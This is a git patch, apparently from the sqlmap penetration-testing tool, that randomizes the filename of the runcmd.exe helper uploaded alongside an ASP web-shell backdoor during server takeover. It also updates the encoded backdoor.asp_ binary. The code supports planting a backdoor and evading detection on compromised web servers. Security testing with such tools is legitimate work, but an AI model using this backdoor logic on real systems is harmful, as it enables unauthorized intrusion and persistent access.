From 15d1fcbb7f18d4161a395f1a51e6fd554b425bdc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 25 Feb 2010 10:47:12 +0000
Subject: [PATCH] now runcmd exe has random name too

---
 lib/takeover/web.py |   6 +++---
 shell/backdoor.asp_ | Bin 429 -> 434 bytes
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 0512b772e..6461f961c 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -200,11 +200,11 @@ class Web:
             logger.info(infoMsg)
             
             if self.webApi == "asp":
-                runcmdName = 'runcmd.exe'
-                runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, runcmdName + '_'), runcmdName)
+                runcmdName = "tmpe%s.exe" % randomStr(4)
+                runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
                 scriptsDirectory = "Scripts"
                 backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
-                backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory)
+                backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
                 backdoorStream.file.truncate()
                 backdoorStream.read()
                 backdoorStream.seek(0)
diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_
index f46d884aa5413a961885a9bb4fc7c722c23f4894..cabdd0cfeebe1e474ec99d8b003c9aaa74384be0 100644
GIT binary patch
literal 434
zcmV;j0ZslrB^O3cJ|<Z#Cah_m5PyFy-++H_EFOk<K=0nfzxV$SPkx&+v7pgc)6x<=
z${W$AsDF5rWG<k8)YS58*)n*j1wVg(exQGpUpBN>wM;w020wp)OA=ZQLeFl<a4+_S
zYfMvp>l-qz@=aKcIp|U4IrLJ<sTFb0Yl6y{7NKQ!&=7NxV>!}!22HR{PuLyUab}d-
zWjKjSD<Mjx4Tc%qi|*56TDp{20y>pXN*sT?YI@5<%7d2`(Tm<pjJm8`YPXw!2>G3V
z;9m~}(`g=nIOOInR%XqiUT(b+;yv_h(WtuP$}5XrMG`k9Cj%>Tf3l}_-8;99f>E&L
zH@S@)47K^7L5t@jY)2gP*g>*Kci{UDOp(j6IC2=pJolZLZ87nKhF|^T^n2eI6t6Uq
zG+uxg(+cEc|KZG1f-kl2bI)tU)Pyn(PGOhiq}yCXJegUJ51f?bL>$YBhpqBlu$KL8
zeVCeYiO5gF#_OdGFEN~3c_jrY%YHW7W7*p-Q>@6RBG!h7!d1+UhQt`oPL{HMHc>2x
cDt#9!cbIu<At4HCcwqRul2*cmg&(x@2U7&o<NyEw

literal 429
zcmV;e0aE@wB^O3cJ|<Z#CO>T|Ie&jFAb@{wEFOk<K=0m!zxV$SPkx&-iyl@!LUKGa
zchf(9r>UTSOL8+=l*D<4KhS@Fe|}doJsE@+XPK#)KXPSFa4v}}#`6|?crW;qX;~VO
zLKB#a84PU_iG+)SqY+Ip=&EtDbw1@YK5LOX%1C)ijFNk9O&TB8<=BD`TxOKCOpaSB
zE)A`FYei&xBJFK#8xzqzoeF2_9~H)a3RQF(OR8@qC}>y?pc~UBQ>z->!wv^eMNXCF
zP>%%_I=9Ts)^6dq*>VbmtDw-G7RH>1#|F7;u8Wy?Vs>qPVT5Z(qIaM<*x5yty>6Ck
znyp)*7;*9HT1j?)`+;lGdeo;#UXO)5@<UNsFiwI2Km0h(ZUlTXC0~jt6T5skDFPdi
z0Mc_&PFN-Qhct=}N?ukI$7>6^1#%2#nmN5)j^Y-g48|gyH1P7Fx{@HF9W|7VE=6uj
zAx_4S$Xr-e16;ct@j0U7)m0YG@P&g&Z_`VlF|Qp=4M2R28ySW0@LX@gKo`ev3dJv&
XfI0QJxbRkUzvAvUr*&<2eKn}ShdI3=